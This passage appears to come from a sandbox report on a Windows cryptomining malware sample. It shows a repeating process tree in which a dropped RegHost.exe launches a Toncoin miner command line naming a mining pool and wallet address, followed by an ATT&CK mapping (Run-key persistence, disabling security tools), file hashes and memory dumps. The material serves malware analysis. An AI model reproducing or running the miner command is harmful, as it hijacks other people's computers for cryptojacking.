C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1904

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2960

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
10⤵
PID:356

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
10⤵
PID:372

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
11⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2328

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
12⤵
PID:3212

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
12⤵
PID:3968

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
13⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
PID:1428

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
14⤵
PID:4000

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
14⤵
PID:2476

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
15⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2856

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
16⤵
PID:928

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
16⤵
PID:2288

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
17⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:436

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
18⤵
PID:1508

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
18⤵
PID:2064

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
19⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:592

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
20⤵
PID:1516

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
20⤵
PID:2036

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
21⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2736

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
22⤵
PID:3040

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
22⤵
PID:2280

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
23⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:356

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
24⤵
PID:3228

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
24⤵
PID:3644

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
25⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2076

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
26⤵
PID:3860

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
26⤵
PID:3656

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
27⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:3624

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
28⤵
PID:1240

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
28⤵
PID:3000

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
29⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1676

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool https://server1.whalestonpool.com --user EQAP2qRJuOQami_vJaEGhoLhb3Upt_Ju7WwLXQ9ktcpis6qe
30⤵
PID:3460

C:\Windows\explorer.exe
C:\Windows\explorer.exe "None" "Microsoft%20Basic%20Display%20Adapter" "Toncoin" "ton"
30⤵
PID:3544

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
7e80c2ae5587b824d8230e782089e86b

SHA1
90f0912a29b9cc7a55bd4b561e1a574e005cecf6

SHA256
43d66e78f5334cc183e22aa29c64a9fdf4356e5a0c5052489fd7edc127460a6c

SHA512
db0e42e94976b9fe4d75a502b0a32f3ec4e6b993de02781ccef11a4aebc0fb0cedf1d43cd2280faa186edb66ff869f2b883f091889958625081b1a97cde5203a

Download Submit
memory/356-189-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/356-187-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/356-188-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/372-149-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/432-125-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/432-124-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/432-123-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/436-166-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/436-167-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/436-168-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/592-173-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/592-175-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/592-174-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/1060-118-0x0000000140000000-0x000000014274C000-memory.dmp

Filesize
39.3MB

Download
memory/1156-119-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1156-120-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1292-135-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1516-137-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/1516-138-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/1516-139-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/1904-142-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2036-178-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2064-171-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2076-195-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2076-196-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2076-194-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2280-185-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2288-164-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/2328-153-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2328-152-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2328-151-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2736-181-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2736-180-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2736-182-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2856-160-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2856-161-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2856-159-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2960-145-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2960-144-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/2960-146-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/3000-206-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3544-213-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3624-201-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/3624-203-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/3624-202-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/3644-192-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3656-199-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3704-117-0x00007FF6A7860000-0x00007FF6A81A9000-memory.dmp

Filesize
9.3MB

Download
memory/3704-116-0x00007FF6A7860000-0x00007FF6A81A9000-memory.dmp

Filesize
9.3MB

Download
memory/3704-115-0x00007FF6A7860000-0x00007FF6A81A9000-memory.dmp

Filesize
9.3MB

Download
memory/3716-128-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/3968-156-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/4056-130-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/4056-131-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download
memory/4056-132-0x00007FF67E330000-0x00007FF67EC79000-memory.dmp

Filesize
9.3MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads